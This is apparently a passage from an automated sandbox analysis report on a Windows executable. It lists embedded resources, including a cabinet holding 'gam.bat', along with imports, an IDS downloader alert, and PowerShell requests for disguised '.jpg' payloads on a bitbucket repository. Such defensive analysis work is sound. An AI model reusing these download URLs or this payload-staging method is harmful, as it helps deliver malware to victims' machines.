                                                                                        .reloc0x2f0000x2c0x1000cf22972a59e8c2a2ad0453d649f2025dFalse0.017578125data0.10781936458684958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        AVI0xfac80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                        RT_ICON0x128e40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                        RT_ICON0x12f4c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                        RT_ICON0x132340x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                        RT_ICON0x1341c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                        RT_ICON0x135440xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                        RT_ICON0x143ec0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                        RT_ICON0x14c940x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                        RT_ICON0x1535c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                        RT_ICON0x158c40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                        RT_ICON0x232980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                        RT_ICON0x258400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                        RT_ICON0x268e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                        RT_ICON0x272700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                        RT_ICON0x276d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.32978723404255317
                                                                                        RT_ICON0x27b400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.19394934333958724
                                                                                        RT_ICON0x28be80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1354771784232365
                                                                                        RT_DIALOG0x2b1900x2f2dataEnglishUnited States0.4389920424403183
                                                                                        RT_DIALOG0x2b4840x1b0dataEnglishUnited States0.5625
                                                                                        RT_DIALOG0x2b6340x166dataEnglishUnited States0.5223463687150838
                                                                                        RT_DIALOG0x2b79c0x1c0dataEnglishUnited States0.5446428571428571
                                                                                        RT_DIALOG0x2b95c0x130dataEnglishUnited States0.5526315789473685
                                                                                        RT_DIALOG0x2ba8c0x120dataEnglishUnited States0.5763888888888888
                                                                                        RT_STRING0x2bbac0x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                        RT_STRING0x2bc380x520dataEnglishUnited States0.4032012195121951
                                                                                        RT_STRING0x2c1580x5ccdataEnglishUnited States0.36455525606469
                                                                                        RT_STRING0x2c7240x4b0dataEnglishUnited States0.385
                                                                                        RT_STRING0x2cbd40x44adataEnglishUnited States0.3970856102003643
                                                                                        RT_STRING0x2d0200x3cedataEnglishUnited States0.36858316221765913
                                                                                        RT_RCDATA0x2d3f00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_RCDATA0x2d3f80xde6Microsoft Cabinet archive data, Windows 2000/XP setup, 3558 bytes, 1 file, at 0x2c +A "gam.bat", ID 666, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0030916245081507
                                                                                        RT_RCDATA0x2e1e00x4dataEnglishUnited States3.0
                                                                                        RT_RCDATA0x2e1e40x24dataEnglishUnited States0.7777777777777778
                                                                                        RT_RCDATA0x2e2080x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_RCDATA0x2e2100x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_RCDATA0x2e2180x4dataEnglishUnited States3.0
                                                                                        RT_RCDATA0x2e21c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_RCDATA0x2e2240x4dataEnglishUnited States3.0
                                                                                        RT_RCDATA0x2e2280xfASCII text, with no line terminatorsEnglishUnited States1.5333333333333334
                                                                                        RT_RCDATA0x2e2380x4dataEnglishUnited States3.0
                                                                                        RT_RCDATA0x2e23c0x4dataEnglishUnited States3.0
                                                                                        RT_RCDATA0x2e2400x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_RCDATA0x2e2480x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                        RT_GROUP_ICON0x2e2500x30data0.9166666666666666
                                                                                        RT_GROUP_ICON0x2e2800xbcdataEnglishUnited States0.6117021276595744
                                                                                        RT_VERSION0x2e33c0x408dataEnglishUnited States0.42248062015503873
                                                                                        RT_MANIFEST0x2e7440x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                        Imports

                                                                                        DLLImport
                                                                                        ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                        KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                        GDI32.dllGetDeviceCaps
                                                                                        USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                        msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                        COMCTL32.dll
                                                                                        Cabinet.dll
                                                                                        VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-02T19:04:55.491964+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849705185.166.143.49443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 2, 2024 19:04:53.002674103 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.002710104 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:53.002826929 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.057089090 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.057116032 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:53.695092916 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:53.695177078 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.766855001 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.766890049 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:53.767249107 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:53.820209026 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.908698082 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:53.951423883 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194798946 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194812059 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194830894 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194838047 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194863081 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194878101 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194900036 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.194900036 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.194915056 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194928885 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.194937944 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.194964886 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.276596069 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.276684046 CEST44349704185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.276773930 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.276773930 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.285245895 CEST49704443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.331137896 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.331244946 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:54.331355095 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.331629992 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:54.331666946 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.073693037 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.082010984 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.082056999 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.491982937 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.492012978 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.492027998 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.492109060 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.492132902 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.492147923 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.492178917 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.577543974 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.577619076 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.577625990 CEST44349705185.166.143.49192.168.2.8
                                                                                        Oct 2, 2024 19:04:55.577668905 CEST49705443192.168.2.8185.166.143.49
                                                                                        Oct 2, 2024 19:04:55.578078985 CEST49705443192.168.2.8185.166.143.49

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 2, 2024 19:04:52.988734961 CEST5781853192.168.2.81.1.1.1
                                                                                        Oct 2, 2024 19:04:52.995832920 CEST53578181.1.1.1192.168.2.8

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 2, 2024 19:04:52.988734961 CEST192.168.2.81.1.1.10xf74bStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 2, 2024 19:04:52.995832920 CEST1.1.1.1192.168.2.80xf74bNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 19:04:52.995832920 CEST1.1.1.1192.168.2.80xf74bNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 19:04:52.995832920 CEST1.1.1.1192.168.2.80xf74bNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • bitbucket.org

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.849704185.166.143.494436592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 17:04:53 UTC110OUTGET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1
                                                                                        Host: bitbucket.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-02 17:04:54 UTC3988INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 17:04:54 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 15020
                                                                                        Server: AtlassianEdge
                                                                                        Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                        X-Used-Mesh: False
                                                                                        Content-Language: en
                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                        Etag: "87058da896b55747ba4e6e46ed4a200d"
                                                                                        X-Dc-Location: Micros-3
                                                                                        X-Served-By: 52563790643d
                                                                                        X-Version: 3ff600212c86
                                                                                        X-Static-Version: 3ff600212c86
                                                                                        X-Request-Count: 3879
                                                                                        X-Render-Time: 0.10709047317504883
                                                                                        X-B3-Traceid: f9323d398cc148a7b6a0238c8cc639ad
                                                                                        X-B3-Spanid: 1a15bdc36336d4d5
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Content-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-5klEsQ+/lmMPaGnHlTQm6A=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.ser [TRUNCATED]
                                                                                        X-Usage-Quota-Remaining: 998379.615
                                                                                        X-Usage-Request-Cost: 1650.63
                                                                                        X-Usage-User-Time: 0.047510
                                                                                        X-Usage-System-Time: 0.002009
                                                                                        X-Usage-Input-Ops: 0
                                                                                        X-Usage-Output-Ops: 0
                                                                                        Cache-Control: max-age=900
                                                                                        Age: 406
                                                                                        X-Cache: HIT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Xss-Protection: 1; mode=block
                                                                                        Atl-Traceid: a9e52b1d8e51437387085773ed764a45
                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                        Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=3,atl-edge-upstream;dur=91,atl-edge-pop;desc="aws-eu-central-1"
                                                                                        Connection: close
                                                                                        2024-10-02 17:04:54 UTC12396INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6b 6c 45 73 51 2b 2f 6c 6d 4d 50 61 47 6e 48 6c 54 51 6d 36 41 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="5klEsQ+/lmMPaGnHlTQm6A==">if (wind
                                                                                        2024-10-02 17:04:54 UTC2624INData Raw: 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 64 65 70 6c 6f 79 6d 65 6e 74 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 72 75 6e 6e 65 72 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 72 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 20 66 61 6c 73 65 2c 20 22 63 6f 6d 6d 69 74 2d 65 78 70 61 6e 64 2d 69 6e 6e 6f 22 3a 20 66 61 6c 73 65 2c 20 22 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 69 6e 67 22 3a 20 66 61 6c 73 65 2c 20 22 63 72 65 61 74 65 2d 77 6f 72 6b 73 70 61 63 65 2d 73 68 6f 77 2d 72 65 63 61 70 74 63 68 61 22
                                                                                        Data Ascii: i-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.849705185.166.143.494436592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 17:04:55 UTC87OUTGET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1
                                                                                        Host: bitbucket.org
                                                                                        2024-10-02 17:04:55 UTC3986INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 17:04:55 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 15023
                                                                                        Server: AtlassianEdge
                                                                                        Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                        X-Used-Mesh: False
                                                                                        Content-Language: en
                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                        Etag: "d262e8bacb3f21ca001bdceb1cfc66a0"
                                                                                        X-Dc-Location: Micros-3
                                                                                        X-Served-By: c1d37df8df76
                                                                                        X-Version: 3ff600212c86
                                                                                        X-Static-Version: 3ff600212c86
                                                                                        X-Request-Count: 461
                                                                                        X-Render-Time: 0.09731030464172363
                                                                                        X-B3-Traceid: 8ba6f34777ac4d28bfc0b737ee6a4d2f
                                                                                        X-B3-Spanid: 9c57bf6c5c877b71
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-y+F3Ri7t30+2yS3vrtRQPg=='; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.pro [TRUNCATED]
                                                                                        X-Usage-Quota-Remaining: 997696.229
                                                                                        X-Usage-Request-Cost: 1570.30
                                                                                        X-Usage-User-Time: 0.038994
                                                                                        X-Usage-System-Time: 0.008115
                                                                                        X-Usage-Input-Ops: 0
                                                                                        X-Usage-Output-Ops: 0
                                                                                        Cache-Control: max-age=900
                                                                                        Age: 83
                                                                                        X-Cache: HIT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Xss-Protection: 1; mode=block
                                                                                        Atl-Traceid: ec752bc7bf1e468fac49005661e35936
                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                        Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=2,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
                                                                                        Connection: close
                                                                                        2024-10-02 17:04:55 UTC12398INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 2b 46 33 52 69 37 74 33 30 2b 32 79 53 33 76 72 74 52 51 50 67 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="y+F3Ri7t30+2yS3vrtRQPg==">if (wind
                                                                                        2024-10-02 17:04:55 UTC2625INData Raw: 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 64 65 70 6c 6f 79 6d 65 6e 74 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 72 75 6e 6e 65 72 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 72 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 20 66 61 6c 73 65 2c 20 22 63 6f 6d 6d 69 74 2d 65 78 70 61 6e 64 2d 69 6e 6e 6f 22 3a 20 66 61 6c 73 65 2c 20 22 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 69 6e 67 22 3a 20 66 61 6c 73 65 2c 20 22 63 72 65 61 74 65 2d 77 6f 72 6b 73 70 61 63 65 2d 73 68 6f 77 2d 72 65 63 61 70 74 63 68 61
                                                                                        Data Ascii: ui-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Users\user\Desktop\0XVZC3kfwL.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\0XVZC3kfwL.exe"
                                                                                        Imagebase:0x7ff681c20000
                                                                                        File size:192'512 bytes
                                                                                        MD5 hash:AF93D5A246B37CE552356E6B61C9AEC9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c gam.bat
                                                                                        Imagebase:0x7ff78dd20000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

